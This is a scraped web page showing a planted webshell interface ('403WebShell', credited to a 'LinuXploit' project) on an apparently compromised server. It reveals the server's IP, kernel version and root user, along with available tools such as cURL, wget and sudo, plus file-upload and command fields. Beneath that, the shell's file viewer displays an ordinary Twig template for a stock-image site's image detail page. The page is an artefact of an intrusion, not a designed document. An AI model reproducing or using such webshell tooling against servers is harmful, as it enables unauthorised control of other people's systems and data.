WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/templates/stock/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/templates/stock/show.html.twig
{% extends 'base.html.twig' %}
{% block header_class %}{% endblock %}

{% block title %}Sura Images!{% endblock %}

{% block hero_banner %}

{% endblock %}
{% block header %}
    {% include 'dashboard/header.html.twig' %}
{% endblock %}

{% block body %}
    {# @var helper \App\Service\Helper #}
<div class="app_main_inner">
    <div class="section_stock_detail">
        <div class="wrap">
            <div class="stock_wrap">
                <h2 class="stock_title">{{ image.title }}</h2>
                <div class="stock_detail_left">
                    <img src="{{ asset('uploads/stock/'~ image.thumbName) }}" class="detail_thumbnail">
                    <div class="thumbnail_int">
                        <a href="{{ path('membershp_member_download_preview',{'id':image.id}) }}"
                           class="download_preview">Download Preview</a>
                        <div class="share_main">
                            <a href="" class="share_trigger" data-toggle="dropdown">Share</a>
                            <ul class="dropdown-menu">
                                <li><a href=""><img src="{{ asset('images/twitter_square.svg') }}" alt="">Twitter</a>
                                </li>
                                <li><a href=""><img src="{{ asset('images/facebook_square.svg') }}" alt="">Facebook</a>
                                </li>
                                <li><a href=""><img src="{{ asset('images/google_square.svg') }}" alt="">Google +</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="details_table">
                        <table>
                            <tbody>
                            <tr>
                                <td>Title</td>
                                <td>{{ image.title }}</td>
                            </tr>
                            <tr>
                                <td>Image ID</td>
                                <td>suraimages_{{ image.id }}</td>
                            </tr>
                            <tr>
                                <td>Release Information</td>
                                <td>No</td>
                            </tr>
                            <tr>
                                <td>License Type</td>
                                <td>{{ image.licenceType }}</td>
                            </tr>
                            <tr>
                                <td>Image Type</td>
                                <td>{{ image.type }}</td>
                            </tr>
                            <tr>
                                <td>Photographer</td>
                                <td>{{ image.contributor.firstName }}  {{ image.contributor.lastName }}</td>
                            </tr>
                            <tr>
                                <td>Categories</td>
                                <td>{{ image.category }}</td>
                            </tr>
                            </tbody>
                        </table>
                    </div>
                </div>


                <div class="stock_detail_right">
                    <ul class="licence_tabs">
                        <li class="active"><a href="#standard_licence" data-toggle="tab" aria-expanded="true">Payout
                                Details- Standard</a></li>
                        <li><a class="nav-link exclusive exclusive_royalty_free" data-toggle="tab"
                               href="#exclusive_licence">Exclusive Licence </a></li>
                    </ul>

                    <div class="tab-content">
                        <div class="alert alert-danger" style="display: none">
                        </div>
                        <div class="tab_pane fade show active in" id="standard_licence">

                            <label for="small_size" class="selectable_type">
                                <input type="radio" data-size="small" name="selectable_options"
                                       value="{{ image.priceLarge }}" id="small_size" class="selected_tag price_tag">
                                <span class="select_left">
                                    <h4>Price</h4>

                                </span>
                                <span class="select_right">${{image.priceLarge }}</span>
                            </label>

                            {% for key, payout in payouts %}

                                <label for="small_size" class="selectable_type">
                                    <input type="radio" data-size="small" name="selectable_options"
                                           value="{{ image.priceSmall }}" id="small_size" class="selected_tag price_tag">
                                    <span class="select_left">
                                    <h4>{{key }}</h4>
                                    <p>{{ payout.percentage*100 }}%</p>
                                </span>
                                    <span class="select_right">${{ payout.amount }}</span>
                                </label>
                            {% endfor %}

                            <label for="small_size" class="selectable_type">
                                <input type="radio" data-size="small" name="selectable_options"
                                       value="{{ image.priceSmall }}" id="small_size" class="selected_tag price_tag">
                                <span class="select_left">
                                    <h4>Nett</h4>

                                </span>
                                <span class="select_right">${{ nett }}</span>
                            </label>

                        </div>
                        <div class="tab_pane fade" id="exclusive_licence">
                            <div class="licence_excerpt">
                                Exclusive license means that the licensee/ the buyer has exclusive rights to the content
                                (Images, Videos) they buy for a specified period of time. Meaning, the licensee will be
                                the only person to use the content s for the stipulated period of time and within that
                                period the content s will be inactive for purchase from any other licensee until the
                                duration of the license e pires. See our Exclusivity & Control page for more
                                information.
                            </div>

                        </div>

                    </div>


                </div>


            </div>
        </div>


    </div>

    {% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit